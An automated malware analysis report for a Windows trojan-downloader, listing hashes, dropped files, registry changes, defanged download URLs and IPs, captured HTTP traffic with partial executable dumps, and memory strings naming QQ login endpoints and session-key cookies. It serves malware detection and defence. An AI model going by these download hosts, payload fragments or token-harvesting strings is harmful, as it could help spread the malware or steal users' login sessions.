Gen.Variant.Strictor.115846_ac088163cc

by malwarelabrobot on May 16th, 2017 in Malware Descriptions.

Trojan-Downloader.Win32.AirJP.dx (Kaspersky), Gen:Variant.Strictor.115846 (B) (Emsisoft), Gen:Variant.Strictor.115846 (AdAware), Trojan-PSW.Win32.MSNPassword.FD, Trojan.Win32.FlyStudio.FD, Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR, GenericEmailWorm.YR, PackedThemida.YR, TrojanFlyStudio.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan-PSW, Trojan, Worm, EmailWorm, Packed


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: ac088163cc21f7fcd2ffe29a19681b9d
SHA1: 5187eb0eda83345f832ae9b5f999a08890507dbb
SHA256: de2be1821fb62984b6b0cf049c9c2f12e8d5bbb1deb58c05ca7e5eb4b7ff02e4
SSDeep: 24576:ZN7GLYkW0tsMCraUqwiWd9t2fTIqjZJrTENRDp9zNDS9rPZZJ6eoSWjhAUIS0eXI:2WraUfiWnSdZSV/DojkeoSWjC5iXFBU
Size: 1659392 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: Mail.Ru
Created at: 2017-04-14 17:10:16
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan-Downloader. Trojan program, which downloads files from the Internet without user's notice and executes them.

Payload

Behaviour Description
EmailWorm Worm can send e-mails.


Process activity

The Trojan creates the following process(es):

txservices.exe:760

The Trojan injects its code into the following process(es):

%original file name%.exe:4032
sesvcs_963_56089.exe:2324

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:4032 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\txservices.exe (1638 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LQUMIDKJ\26727603220161118442467[1].htm (92423 bytes)
C:\exdui.dll (53 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\PRU52LTK.txt (90 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LQUMIDKJ\baidu_com[1].htm (0 bytes)

The process txservices.exe:760 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\23.txt (111347 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\IBPSKBRA\NamuADLook[1].dll (17850 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\X66G0HIG\33[1].txt (40 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\TIR4YGN2\01[1].txt (102386 bytes)
%Program Files%\sesvcs_963_56089.exe (1815 bytes)
%Program Files%\NamuADLook.dll (21746 bytes)
C:\help.dll (202 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\G1K1JV5K.txt (112 bytes)

Registry activity

The process %original file name%.exe:4032 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4AE6FCD0-212D-417D-82A8-CFA05ACC2876}]
"WpadDecisionTime" = "40 13 33 AA BE CD D2 01"
"WpadDecisionReason" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\ac088163cc21f7fcd2ffe29a19681b9d_RASMANCS]
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\ac088163cc21f7fcd2ffe29a19681b9d_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad]
"WpadLastNetwork" = "{4AE6FCD0-212D-417D-82A8-CFA05ACC2876}"

[HKLM\SOFTWARE\Microsoft\Tracing\ac088163cc21f7fcd2ffe29a19681b9d_RASMANCS]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\ac088163cc21f7fcd2ffe29a19681b9d_RASAPI32]
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-fb-cd-cc]
"WpadDecision" = "3"

[HKCU\Software\Classes\Local Settings\MuiCache\2C\52C64B7E]
"LanguageList" = "en-US, en"

[HKLM\SOFTWARE\Microsoft\Tracing\ac088163cc21f7fcd2ffe29a19681b9d_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4AE6FCD0-212D-417D-82A8-CFA05ACC2876}]
"WpadDecision" = "3"

"WpadNetworkName" = "Network 2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-fb-cd-cc]
"WpadDecisionTime" = "40 13 33 AA BE CD D2 01"

[HKLM\SOFTWARE\Microsoft\Tracing\ac088163cc21f7fcd2ffe29a19681b9d_RASAPI32]
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 38 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\ac088163cc21f7fcd2ffe29a19681b9d_RASMANCS]
"EnableConsoleTracing" = "0"
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\ac088163cc21f7fcd2ffe29a19681b9d_RASAPI32]
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "46 00 00 00 0A 00 00 00 09 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-fb-cd-cc]
"WpadDecisionReason" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\ac088163cc21f7fcd2ffe29a19681b9d_RASMANCS]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\ac088163cc21f7fcd2ffe29a19681b9d_RASAPI32]
"FileTracingMask" = "4294901760"
"MaxFileSize" = "1048576"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

The process txservices.exe:760 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4AE6FCD0-212D-417D-82A8-CFA05ACC2876}]
"WpadDecisionTime" = "80 AD 33 B1 BE CD D2 01"
"WpadDecisionReason" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\txservices_RASAPI32]
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\txservices_RASAPI32]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\txservices_RASMANCS]
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-fb-cd-cc]
"WpadDecision" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\txservices_RASMANCS]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\txservices_RASAPI32]
"EnableConsoleTracing" = "0"
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-fb-cd-cc]
"WpadDecisionReason" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\txservices_RASMANCS]
"EnableConsoleTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4AE6FCD0-212D-417D-82A8-CFA05ACC2876}]
"WpadDecision" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\txservices_RASAPI32]
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{4AE6FCD0-212D-417D-82A8-CFA05ACC2876}]
"WpadNetworkName" = "Network 2"

[HKLM\SOFTWARE\Microsoft\Tracing\txservices_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 39 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\txservices_RASAPI32]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\txservices_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-fb-cd-cc]
"WpadDecisionTime" = "80 AD 33 B1 BE CD D2 01"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

Dropped PE files

MD5 File path
95a848da53e6ec6858692637d90ddcea c:\Program Files\NamuADLook.dll
0ebe4c4bf9b2c3aba1195d40d7330e5d c:\Program Files\sesvcs_963_56089.exe
95a848da53e6ec6858692637d90ddcea c:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\IBPSKBRA\NamuADLook[1].dll
0ebe4c4bf9b2c3aba1195d40d7330e5d c:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\TIR4YGN2\01[1].txt
c472335b008c5942ec8a162177058111 c:\exdui.dll
15a43a47885c3eff331e97137c08343d c:\help.dll
3a717af75626abe76c29c850915c8782 c:\txservices.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name: www.cfzhushou.com
Product Name: www.cfzhushou.com
Product Version: 2.6.1.0
Legal Copyright: Copyright (C) 2017 CF????
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 2.6.1.0
File Description: CF????
Comments: www.cfzhushou.com
Language: English (United States)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
UPX0 4096 3661824 0 0 d41d8cd98f00b204e9800998ecf8427e
UPX1 3665920 1630208 1628672 5.54507 56d18f5b8ab6c7ddae6ecbb3ca2d066a
.rsrc 5296128 32768 29696 3.80428 821d5df5c9a5a71659f005493551c053

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://www.a.shifen.com/
hxxp://blog.163.com/leesin_2017/blog/static/26727603220161118442467/ 115.238.126.134
hxxp://download.verycdn.net/aload/as/33.txt
hxxp://xzdownad.zglhsw.com/adpub//01.txt 162.159.211.8
hxxp://xzdownad.zglhsw.com/aload/cp/NamuADLook.dll 162.159.211.8
hxxp://down.9udn.com/aload/as/33.txt 112.35.35.201
hxxp://www.baidu.com/
dns.msftncsi.com 131.107.255.255
teredo.ipv6.microsoft.com 157.56.120.207


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY PE EXE or DLL Windows file download HTTP
ET MALWARE Possible Windows executable sent when remote host claims to send a Text File
ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected

Traffic

HEAD /adpub//01.txt HTTP/1.1
User-Agent: MyAppByMulinB
Host: xzdownad.zglhsw.com
Content-Length: 0
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Mon, 15 May 2017 16:03:27 GMT
Content-Type: text/plain
Content-Length: 2373334
Connection: keep-alive
Set-Cookie: __cfduid=dba1850274a3f8d4ad41f37985123a79e1494864206; expires=Tue, 15-May-18 16:03:26 GMT; path=/; domain=.zglhsw.com; HttpOnly
Last-Modified: Mon, 15 May 2017 05:53:11 GMT
Accept-Ranges: bytes
ETag: "6c9efe883fcdd21:14c4"
X-Powered-By: ASP.NET
Server: yunjiasu-nginx
CF-RAY: 35f753ca74d16b49-WAW
....


GET /adpub//01.txt HTTP/1.1


User-Agent: MyAppByMulinB
Host: xzdownad.zglhsw.com
Cache-Control: no-cache
Cookie: __cfduid=dba1850274a3f8d4ad41f37985123a79e1494864206


HTTP/1.1 200 OK
Date: Mon, 15 May 2017 16:03:27 GMT
Content-Type: text/plain
Content-Length: 2373334
Connection: keep-alive
Last-Modified: Mon, 15 May 2017 05:53:11 GMT
Accept-Ranges: bytes
ETag: "6c9efe883fcdd21:14c4"
X-Powered-By: ASP.NET
Server: yunjiasu-nginx
CF-RAY: 35f753ce47456b49-WAW
MZ......................@...................................@...PE..L.
..oE]V..............................O......0....@.....................
......O......J$...@.................................m............Z....
......................................................................
................................   .    .p..........................@.
...rsrc....`.......*..................@....idata  ....................
........@...        .P!.........................@...fszhhkpv.`...@=..`
..................@...ehkuvgxn......O......6$.............@...........
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................g...\....otnB..Kb ....aO..
.J......).b'..V..U...U...y.W....p.[op.j.5.7G.Ea.5.r.....{<..8.2....
....#.....}^..Z.ih..'...!..T.......Ae6|.!..b..q.....@...M..uAK...V...W
.........B..Y|.....U..!!BiD1.6!%.b#U....}.e..yT..t?`..]....3[c...s..Z&
lt;|4....N..HN'......Q.L.X...|e....Q7..b.%..GmZ.. .fhZ .4...W.:.`....*
..).2.h,H..FFA.O.'....9.b. Z<.\.6.....&..y.F..Z@Z..r~.h.%....As}0..
=...C....v......)........b....c..Q..B.....jX..b.A......W.qv]T.....]r..
v..,...s....R.:.Bh....E...6?....yDrn.x..La.@......../.n.l$.ZT.)..\
<<< skipped >>>

HEAD /aload/cp/NamuADLook.dll HTTP/1.1


User-Agent: MyAppByMulinB
Host: xzdownad.zglhsw.com
Content-Length: 0
Cache-Control: no-cache
Cookie: __cfduid=dba1850274a3f8d4ad41f37985123a79e1494864206


HTTP/1.1 200 OK
Date: Mon, 15 May 2017 16:03:40 GMT
Content-Type: application/x-msdownload
Content-Length: 373248
Connection: keep-alive
Last-Modified: Tue, 28 Feb 2017 15:41:16 GMT
Accept-Ranges: bytes
ETag: "0f6f718d991d21:14c4"
X-Powered-By: ASP.NET
Server: yunjiasu-nginx
CF-RAY: 35f7541ea4a36b49-WAW
....


GET /aload/cp/NamuADLook.dll HTTP/1.1


User-Agent: MyAppByMulinB
Host: xzdownad.zglhsw.com
Cache-Control: no-cache
Cookie: __cfduid=dba1850274a3f8d4ad41f37985123a79e1494864206


HTTP/1.1 200 OK
Date: Mon, 15 May 2017 16:03:40 GMT
Content-Type: application/x-msdownload
Content-Length: 373248
Connection: keep-alive
Last-Modified: Tue, 28 Feb 2017 15:41:16 GMT
Accept-Ranges: bytes
ETag: "0f6f718d991d21:14c4"
X-Powered-By: ASP.NET
Server: yunjiasu-nginx
CF-RAY: 35f75422e73a6b49-WAW
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$........m.YP...P...
P...K...J...K.,.....K.-.....Yt..S...?z-.U...Yt..M...P...X...P...R...N^
..T...K.).x...K...Q...K...Q...K...Q...RichP...........................
PE..L......X...........!..............................................
..................x.....@..........................R..H...d>.......
............................2..0...............................P...@..
..........................................text....~...................
....... ..`.rdata..............................@..@.data....G...`... .
..H..............@....rsrc................h..............@..@.reloc...
F.......H...j..............@..B.......................................
......................................................................
......................................................................
......................................................................
...............................................U..j.h.y..d.....PQV.Pc.
.3.P.E.d......u..E......E......4`...P..4`..........E.....V.E......#...
......M.d......Y^..]...............U....u.3.]....P...@..u.VWj.j. .PSj.
h............3..G...............Q........D?.Pj.V...........H...@..u.WV
 .PSj.h...........}.Vh..............t.V........_.....^]...............
.U..QW....u._..].SVW..(...j.j.j.j...SWj.h......,....E.@P............u.
^[_..]..E.j.j.PVSWj.h......,.....0....P..I...@..u..]. ...V.......V.%..
......3.9A.^[..._..].U..Q..V.7.A....;.tI.~..S.^.|4..;.u.......E...
<<< skipped >>>


GET /leesin_2017/blog/static/26727603220161118442467/ HTTP/1.1
Accept: */*
Referer: hXXp://blog.163.com/leesin_2017/blog/static/26727603220161118442467/
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: blog.163.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx
Date: Mon, 15 May 2017 16:03:13 GMT
Content-Type: text/html;charset=GBK
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: NTESBLOGSI=1F5EFEA3D1987BCB8CD052E67CA3275B.yqblog15-8010; Domain=.blog.163.com; Path=/
Set-Cookie: usertrack=c 5 hlkZ0UFaCnnZBRbTAg==; expires=Tue, 15-May-18 16:03:13 GMT; domain=.163.com; path=/
P3P: policyref="/w3c/p3p.xml", CP="CUR ADM OUR NOR STA NID"
b49..  <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "ht
tp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..  <html xmlns
="hXXp://VVV.w3.org/1999/xhtml" xml:lang="zh" lang="zh">..  <hea
d>..    <meta http-equiv="X-UA-Compatible" content="IE=7" />.
.    <meta http-equiv="content-type" content="text/html;charset=gbk
"/>..    <meta http-equiv="content-style-type" content="text/css
"/>..    <meta http-equiv="content-script-type" content="text/ja
vascript"/>..    <meta name="version" content="neblog-1.0"/>.
.    <script type="text/javascript">..      ..      ..      docu
ment.uniqueID!=document.uniqueID&&!!location.hash&&(location.hash=loca
tion.hash); ..      document.domain = location.hostname.replace(/^.*\.
([\w] \.[\w] )$/,'$1');..      window.focus();..      window.getMusicT
imeStamp=function(){return 'eed936b82145aa4e371196bbd8bbc26f';};..    
..      //BLOG-647:....OS..............................      (function
(){..        window.setTimeout(function(){..          var _loginUserIc
on = document.getElementById('loginUserIcon');..          var _rsavata
rimg = document.getElementById('rsavatarimg');..          if(!!_loginU
serIcon){..            var _loaded1 = false;..            var _img1 = 
new Image();..            _img1.onload = function(){..                
_loaded1 = true;..                _img1.onload = null;..            };
..            _img1.src = _loginUserIcon.src;..            window.setT
imeout(function(){..              if(!_loaded1){..                
<<< skipped >>>


HEAD /aload/as/33.txt HTTP/1.1
User-Agent: MyAppByMulinB
Host: down.9udn.com
Content-Length: 0
Cache-Control: no-cache


HTTP/1.1 200 OK
Content-Length: 40
Content-Type: text/plain
Last-Modified: Fri, 17 Feb 2017 05:52:26 GMT
Accept-Ranges: bytes
ETag: "1ee814e288d21:14c4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: s-maxage=60
Powered-By-VeryCDN: MISS from cmc-bj-1-3-c2321, MISS from utn-jy-2-2-c2391, MISS from utn-cz-1-1-c2391
Date: Mon, 15 May 2017 16:03:25 GMT
Age: 0
Connection: keep-alive
....


GET /aload/as/33.txt HTTP/1.1


User-Agent: MyAppByMulinB
Host: down.9udn.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Content-Length: 40
Content-Type: text/plain
Last-Modified: Fri, 17 Feb 2017 05:52:26 GMT
Accept-Ranges: bytes
ETag: "1ee814e288d21:14c4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: s-maxage=60
Powered-By-VeryCDN: STALE from cmc-bj-1-3-c2321, HIT from utn-jy-2-2-c2391
Date: Mon, 15 May 2017 16:03:26 GMT
Age: 0
Connection: keep-alive
hXXp://xzdownad.zglhsw.com/adpub//01.txtHTTP/1.1 200 OK..Content-Lengt
h: 40..Content-Type: text/plain..Last-Modified: Fri, 17 Feb 2017 05:52
:26 GMT..Accept-Ranges: bytes..ETag: "1ee814e288d21:14c4"..Server: Mic
rosoft-IIS/6.0..X-Powered-By: ASP.NET..Cache-Control: s-maxage=60..Pow
ered-By-VeryCDN: STALE from cmc-bj-1-3-c2321, HIT from utn-jy-2-2-c239
1..Date: Mon, 15 May 2017 16:03:26 GMT..Age: 0..Connection: keep-alive
..hXXp://xzdownad.zglhsw.com/adpub//01.txt..



HEAD / HTTP/1.1
Accept: */*
Referer: hXXp://VVV.baidu.com/
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: VVV.baidu.com
Content-Length: 0
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: bfe/1.0.8.18
Date: Mon, 15 May 2017 16:03:11 GMT
Content-Type: text/html
Content-Length: 277
Last-Modified: Mon, 13 Jun 2016 02:50:23 GMT
Connection: Keep-Alive
ETag: "575e1f6f-115"
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Accept-Ranges: bytes
HTTP/1.1 200 OK..Server: bfe/1.0.8.18..Date: Mon, 15 May 2017 16:03:11
 GMT..Content-Type: text/html..Content-Length: 277..Last-Modified: Mon
, 13 Jun 2016 02:50:23 GMT..Connection: Keep-Alive..ETag: "575e1f6f-11
5"..Cache-Control: private, no-cache, no-store, proxy-revalidate, no-t
ransform..Pragma: no-cache..Accept-Ranges: bytes..HTTP/1.1 200 OK..Ser
ver: bfe/1.0.8.18..Date: Mon, 15 May 2017 16:03:11 GMT..Content-Type: 
text/html..Content-Length: 277..Last-Modified: Mon, 13 Jun 2016 02:50:
23 GMT..Connection: Keep-Alive..ETag: "575e1f6f-115"..Cache-Control: p
rivate, no-cache, no-store, proxy-revalidate, no-transform..Pragma: no
-cache..Accept-Ranges: bytes..

The Trojan connects to the servers at the folowing location(s):

%original file name%.exe_4032:

`.rsrc
t$(SSh
~%UVW
u$SShe
Hw2.Hw
wininet.dll
ole32.dll
kernel32.dll
user32.dll
User32.dll
Kernel32.dll
shell32.dll
gdiplus.dll
GdiPlus.dll
ntdll.dll
Ole32.dll
OleAut32.dll
oleaut32.dll
gzip.dll
gdi32.dll
Gdi32.dll
imm32.dll
OLEACC.DLL
advapi32.dll
shlwapi.dll
atl.dll
HttpOpenRequestA
HttpSendRequestA
HttpQueryInfoA
MsgWaitForMultipleObjects
GetProcessHeap
ShellExecuteA
GetAsyncKeyState
GdipSetStringFormatHotkeyPrefix
RegisterHotKey
UnregisterHotKey
GetUrlCacheEntryInfoA
RegCloseKey
RegCreateKeyA
RegOpenKeyA
GetWindowsDirectoryA
GdiplusShutdown
RegEnumKeyA
RegQueryInfoKeyA
RegFlushKey
RegOpenKeyExA
RegCreateKeyExA
RegDeleteKeyA
&pt_randsalt=0&u1=http://cf.qq.com/cp/a20160217cfyj/index.htm?e_code=213271&h=1&t=1&g=1&from_ui=1&ptlang=2052&action=2-4-1457704626950&js_ver=10151&js_type=1&login_sig=&pt_uistyle=32&aid=21000124&daid=8&
hXXp://ptlogin2.qq.com/login?u=
&s_url=http://cf.qq.com/comm-htdocs/login/logincallback.htm&f_url=&ptlang=2052&ptredirect=100&aid=21000124&daid=8&j_later=0&low_login_hour=0®master=0&pt_login_type=1&pt_aid=0&pt_aaid=0&pt_light=0&pt_3rd_aid=0
&service=login&nodirect=0&ptsigx=
hXXp://ptlogin4.game.qq.com/check_sig?pttype=1&uin=
p_skey=
skey=
xlogin
login2
pt_login_sig=
[pt_login_sig]
https
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
http=
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
hXXps://
hXXp://
function time(){return Math.random()}
if (e < t.length   11) return uv_alert("Message too long for RSA"),
n = t.length - 1; n >= 0 && e > 0;) {
var o = t.charCodeAt(n--);
for (s[0] = 0; 0 == s[0];) r.nextBytes(s);
this.dmp1 = null,
this.dmq1 = null,
this.coeff = null
null != e && null != i && e.length > 0 && i.length > 0 ? (this.n = t(e, 16), this.e = parseInt(i, 16)) : uv_alert("Invalid RSA public key")
return t.modPowInt(this.e, this.n)
var i = e(t, this.n.bitLength()   7 >> 3);
var n = this.doPublic(i);
var o = n.toString(16);
return 0 == (1 & o.length) ? o: "0"   o
null != t && ("number" == typeof t ? this.fromNumber(t, e, i) : null == e && "string" != typeof t ? this.fromString(t, 256) : this.fromString(t, e))
o = Math.floor(p / 67108864),
return ut.charAt(t)
var i = gt[t.charCodeAt(e)];
return e.fromInt(t),
if (4 != e) return void this.fromRadix(t, e);
for (var n = t.length,
0 > s ? "-" == t.charAt(n) && (o = !0) : (o = !1, 0 == r ? this[this.t  ] = s: r   i > this.DB ? (this[this.t - 1] |= (s & (1 << this.DB - r) - 1) << r, this[this.t  ] = s >> this.DB - r) : this[this.t - 1] |= s << r, r  = i, r >= this.DB && (r -= this.DB))
8 == i && 0 != (128 & t[0]) && (this.s = -1, r > 0 && (this[this.t - 1] |= (1 << this.DB - r) - 1 << r)),
this.clamp(),
o && p.ZERO.subTo(this, this)
for (var t = this.s & this.DM; this.t > 0 && this[this.t - 1] == t;)--this.t
if (this.s < 0) return "-"   this.negate().toString(t);
if (4 != t) return this.toRadix(t);
s = this.DB - p * this.DB % e;
if (p-->0) for (s < this.DB && (i = this[p] >> s) > 0 && (o = !0, r = u(i)); p >= 0;) e > s ? (i = (this[p] & (1 << s) - 1) << e - s, i |= this[--p] >> (s  = this.DB - e)) : (i = this[p] >> (s -= e) & n, 0 >= s && (s  = this.DB, --p)),
return p.ZERO.subTo(this, t),
return this.s < 0 ? this.negate() : this
return this.t <= 0 ? 0 : this.DB * (this.t - 1)   k(this[this.t - 1] ^ this.s & this.DM)
e.t = Math.max(this.t - t, 0),
var i, n = t % this.DB,
o = this.DB - n,
p = Math.floor(t / this.DB),
s = this.s << n & this.DM;
e.clamp()
var i = Math.floor(t / this.DB);
var n = t % this.DB,
o = Math.min(t.t, this.t); o > i;) n  = this[i] - t[i],
e[i  ] = n & this.DM,
n >>= this.DB;
e[i  ] = n & this.DM,
n >>= this.DB;
-1 > n ? e[i  ] = this.DV   n: n > 0 && (e[i  ] = n),
var i = this.abs(),
n = t.abs(),
for (o = 0; o < n.t;   o) e[o   i.t] = i.am(0, n[o], e, o, 0, i.t);
e.clamp(),
this.s != t.s && p.ZERO.subTo(e, e)
for (var e = this.abs(), i = t.t = 2 * e.t; --i >= 0;) t[i] = 0;
var n = e.am(i, e[i], t, 2 * i, 0, 1); (t[i   e.t]  = e.am(i   1, 2 * e[i], t, 2 * i   1, n, e.t - i - 1)) >= e.DV && (t[i   e.t] -= e.DV, t[i   e.t   1] = 1)
t.t > 0 && (t[t.t - 1]  = e.am(i, e[i], t, 2 * i, 0, 1)),
t.clamp()
var n = t.abs();
var o = this.abs();
if (o.t < n.t) return null != e && e.fromInt(0),
void(null != i && this.copyTo(i));
l = this.DB - k(n[n.t - 1]);
l > 0 ? (n.lShiftTo(l, r), o.lShiftTo(l, i)) : (n.copyTo(r), o.copyTo(i));
h = this.FV / d,
for (r.dlShiftTo(v, $), i.compareTo($) >= 0 && (i[i.t  ] = 1, i.subTo($, i)), p.ONE.dlShiftTo(u, $), $.subTo(r, r); r.t < u;) r[r.t  ] = 0;
var w = i[--_] == g ? this.DM: Math.floor(i[_] * h   (i[_ - 1]   f) * m);
if ((i[_]  = r.am(0, w, i, v, 0, u)) < w) for (r.dlShiftTo(v, $), i.subTo($, i); i[_] < --w;) i.subTo($, i)
null != e && (i.drShiftTo(u, e), a != c && p.ZERO.subTo(e, e)),
i.clamp(),
l > 0 && i.rShiftTo(l, i),
0 > a && p.ZERO.subTo(i, i)
return this.abs().divRemTo(t, null, e),
this.s < 0 && e.compareTo(p.ZERO) > 0 && t.subTo(e, e),
return t.s < 0 || t.compareTo(this.m) >= 0 ? t.mod(this.m) : t
t.divRemTo(this.m, null, t)
t.multiplyTo(e, i),
this.reduce(i)
t.squareTo(e),
this.reduce(e)
e = e * (2 - t * e % this.DV) % this.DV,
e > 0 ? this.DV - e: -e
this.mp = t.invDigit(),
this.mpl = 32767 & this.mp,
this.mph = this.mp >> 15,
this.um = (1 << t.DB - 15) - 1,
this.mt2 = 2 * t.t
return t.abs().dlShiftTo(this.m.t, e),
e.divRemTo(this.m, null, e),
t.s < 0 && e.compareTo(p.ZERO) > 0 && this.m.subTo(e, e),
